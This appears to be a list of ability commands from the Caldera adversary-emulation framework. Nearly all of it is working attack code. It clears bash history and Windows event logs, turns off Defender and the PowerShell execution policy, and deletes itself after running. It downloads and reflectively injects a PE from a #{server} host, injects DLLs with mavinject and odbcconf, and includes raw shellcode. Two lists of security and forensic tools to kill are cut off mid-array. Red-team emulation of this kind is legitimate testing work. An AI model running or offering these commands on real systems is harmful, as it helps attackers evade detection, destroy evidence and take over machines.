Caldera emulation abilities

[{"platform": "darwin", "executor": "sh", "command": "sleep 60"}, {"platform": "linux", "executor": "sh", "command": "sleep 60"}, {"platform": "windows", "executor": "psh", "command": "sleep 60"}]

[{"platform": "darwin", "executor": "sh", "command": "> $HOME/.bash_history && unset HISTFILE\n"}, {"platform": "linux", "executor": "sh", "command": "> $HOME/.bash_history && unset HISTFILE\n"}, {"platform": "windows", "executor": "psh", "command": "Clear-History;Clear"}]

[{"platform": "windows", "executor": "psh", "command": "Set-ItemProperty -Path HKLM:\\Software\\Policies\\Microsoft\\Windows\\PowerShell -Name ExecutionPolicy -Value ByPass;\n        $shell = New-Object -ComObject Wscript.Shell\n        Set-ExecutionPolicy Bypass | echo $shell.sendkeys(\"Y`r`n\")"}]

[{"platform": "windows", "executor": "psh,pwsh", "command": "$securityServices = @(\n    \"msmpeng\",\n    \"windefend\",\n    \"mssense\",\n    \"sense\",\n    \"microsoft.tri.sensor\",\n    \"microsoft.tri.sensor.updater\",\n    \"cavp\",\n    \"cb\",\n    \"carbonblack\",\n    \"carbonblackk\",\n    \"cbcomms\",\n    \"cbstream\",\n    \"csfalconservice\",\n    \"csfalconcontainer\",\n    \"csagent\",\n    \"csdevicecontrol\",\n    \"csfalconservice\",\n    \"xagt\",\n    \"xagtnotif\",\n    \"fe_avk\",\n    \"fekern\",\n    \"feelam\",\n    \"fewscservice\",\n    \"ekrn\",\n    \"eguiproxy\",\n    \"egui\",\n    \"eamonm\",\n    \"eelam\",\n    \"ehdrv\",\n    \"ekrnepfw\",\n    \"epfwwfp\",\n    \"ekbdflt\",\n    \"epfw\",\n    \"fsgk32st\",\n    \"fswebuid\",\n    \"fsgk32\",\n    \"fsma32\",\n    \"fssm32\",\n    \"fnrb32\",\n    \"fsaua\",\n    \"fsorsp\",\n    \"fsav32\",\n    \"f-secure gatekeeper handler starter\",\n    \"f-secure network request broker\",\n    \"f-secure webui daemon\",\n    \"fsma\",\n    \"fsorspclient\",\n    \"f-secure gatekeeper\",\n    \"f-secure hips\",\n    \"fsbts\",\n    \"fsni\",\n    \"fsvista\",\n    \"f-secure filter\",\n    \"f-secure recognizer\",\n    \"fses\",\n"}]

[{"platform": "windows", "executor": "psh", "command": "$forensicProcesses = @(\n    \"apimonitor-x64\",\n    \"apimonitor-x86\",\n    \"autopsy64\",\n    \"autopsy\",\n    \"autoruns64\",\n    \"autoruns\",\n    \"autorunsc64\",\n    \"autorunsc\",\n    \"binaryninja\",\n    \"blacklight\",\n    \"cff explorer\",\n    \"cutter\",\n    \"de4dot\",\n    \"debugview\",\n    \"diskmon\",\n    \"dnsd\",\n    \"dnspy\",\n    \"dotpeek32\",\n    \"dotpeek64\",\n    \"dumpcap\",\n    \"evidence center\",\n    \"exeinfope\",\n    \"fakedns\",\n    \"fakenet\",\n    \"ffdec\",\n    \"fiddler\",\n    \"fileinsight\",\n    \"floss\",\n    \"gdb\",\n    \"hiew32demo\",\n    \"hiew32\",\n    \"hollows_hunter\",\n    \"idaq64\",\n    \"idaq\",\n    \"idr\",\n    \"ildasm\",\n    \"ilspy\",\n    \"jd-gui\",\n    \"lordpe\",\n    \"officemalscanner\",\n    \"ollydbg\",\n    \"pdfstreamdumper\",\n    \"pe-bear\",\n    \"pebrowse64\",\n    \"peid\",\n    \"pe-sieve32\",\n    \"pe-sieve64\",\n    \"pestudio\",\n    \"peview\",\n    \"ppee\",\n    \"procdump64\",\n    \"procdump\",\n    \"processhacker\",\n    \"procexp64\",\n    \"procexp\",\n    \"procmon\",\n    \"prodiscoverbasic\",\n    \"py2exedecompiler\",\n    \"r2agent\",\n  "}]

[{"platform": "windows", "executor": "psh,pwsh", "command": "Clear-Eventlog Security;\nClear-Eventlog System;\n"}]

[{"platform": "windows", "executor": "psh", "command": "$startupClass = Get-CimClass -ClassName Win32_ProcessStartup;\n$startupInfo = New-CimInstance -CimClass $startupClass -Property @{ShowWindow = 0} -ClientOnly;\n$processClass = Get-CimClass -ClassName Win32_Process;\nInvoke-CimMethod -CimClass $processClass -MethodName Create -Arguments @{\n    Commandline = 'cmd.exe /c \"timeout /nobreak /t 10 >nul 2>nul & del /f #{location}\"';\n    ProcessStartupInformation = [CimInstance]$startupInfo\n};\n"}, {"platform": "darwin", "executor": "sh", "command": "path=\"$(pwd)/#{exe_name}\";\nnum_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep \"$path\"; done | wc -l);\nif [ \"$num_processes\" -le 1 ]; then /bin/rm -f \"$path\"; fi;\n"}, {"platform": "linux", "executor": "sh", "command": "path=\"$(pwd)/#{exe_name}\";\nnum_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep \"$path\"; done | wc -l);\nif [ \"$num_processes\" -le 1 ]; then /bin/rm -f \"$path\"; fi;"}]

[{"platform": "darwin", "executor": "sh", "command": ""}, {"platform": "linux", "executor": "sh", "command": ""}, {"platform": "windows", "executor": "psh,pwsh", "command": ""}]

[{"platform": "windows", "executor": "psh", "command": "Set-MpPreference -DisableIntrusionPreventionSystem $true;\nSet-MpPreference -DisableIOAVProtection $true;\nSet-MpPreference -DisableRealtimeMonitoring $true;\nSet-MpPreference -DisableScriptScanning $true;\nSet-MpPreference -EnableControlledFolderAccess Disabled;\n"}]

[{"platform": "windows", "executor": "psh", "command": "if (Get-Command \"Set-MPPreference\" -ErrorAction SilentlyContinue) {\n  Set-MPPreference -DisableRealtimeMonitoring 1;\n} else {\n  $service = Get-Service WinDefend -ErrorAction SilentlyContinue;\n  if ($service) {\n    if ($service.Status -eq \"Running\") {\n      Stop-Service WinDefend;\n    }\n  } else {\n    echo \"Windows Defender service not found.\";\n    exit 1;\n  };\n};\n"}]

[{"platform": "windows", "executor": "psh", "command": "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"shared.go\");\n$wc.Headers.add(\"server\",\"#{server}\");\n$PEBytes = $wc.DownloadData($url);\n$wc1 = New-Object System.net.webclient;\n$wc1.headers.add(\"file\",\"Invoke-ReflectivePEInjection.ps1\");\nIEX ($wc1.DownloadString($url));\nInvoke-ReflectivePEInjection -verbose -PBytes $PEbytes -ProcId #{host.process.id}\n"}]

[{"platform": "windows", "executor": "psh", "command": "Copy-Item C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Windows\\Temp\\debug.exe;\nC:\\Windows\\Temp\\debug.exe get-process >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe get-localgroup >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe get-localuser >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe Get-ItemProperty Registry::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion >> C:\\Windows\\temp\\debug.log;\n"}]

[{"platform": "windows", "executor": "psh", "command": "$explorer = Get-Process -Name explorer;\nmavinject.exe $explorer.id C:\\Users\\Public\\sandcat.dll\n"}]

[{"platform": "windows", "executor": "psh", "command": "odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\sandcat.dll\"}\n"}]

[{"platform": "windows", "executor": "shellcode_amd64", "command": "0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3"}]